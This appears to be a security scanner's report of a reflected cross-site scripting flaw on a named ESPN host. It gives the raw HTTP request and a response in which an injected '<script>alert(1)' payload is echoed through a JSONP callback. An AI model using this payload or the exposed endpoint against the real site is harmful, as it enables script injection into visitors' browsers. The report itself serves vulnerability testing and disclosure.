1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://broadband.espn.go |
Path: | /espn3/auth/espnnetworks |
GET /espn3/auth/espnnetworks Accept: */* Referer: http://espn.go.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: broadband.espn.go.com Proxy-Connection: Keep-Alive Cookie: SWID=A7A88F7D-C023-45F5 |
HTTP/1.1 200 OK Cache-Control: no-cache Connection: Keep-Alive Content-Length: 106 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-07/08 jsonp1289161414657ebaa4<script>alert(1)< { "espn3":"invalid", "networks":"invalid" }) |